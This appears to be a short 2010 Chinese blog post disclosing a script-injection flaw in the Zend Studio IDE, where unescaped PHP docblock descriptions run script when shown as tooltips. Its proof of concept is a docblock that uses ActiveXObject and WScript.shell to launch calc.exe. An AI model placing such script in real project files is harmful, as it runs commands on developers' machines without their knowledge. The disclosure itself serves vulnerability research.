Zend studio 转义跨域脚本漏洞

2010年07月11日 | 学习笔记,工具收集| 坏人咖啡

作者：80vul
Zend Studio是一个屡获大奖的专业 PHP 集成开发环境，具备功能强大的专业编辑工具和调试工具，支持PHP语法加亮显示，支持语法自动填充功能，支持书签功能，支持语法自动缩排和代码复制功能，内置一个强大的PHP代码调试工具，支持本地和远程两种调试模式，支持多种高级调试功能。

漏洞描述：
the description of a function of php script does’nt be escaped or htmlencode, so it lead to can be exploited to execute arbitrary HTML and script code what the attacker inject evil codz on function’s description.

DEMO:

[php]

<?php

/**

* <script>new ActiveXObject("WScript.shell").Run(‘calc.exe’,1,true);</script>");

*/

function a() {

}

[/php]

Then Open the function a()’s description [type a word “a” or move your mouse on it] ,the calc.exe well be run.
效果图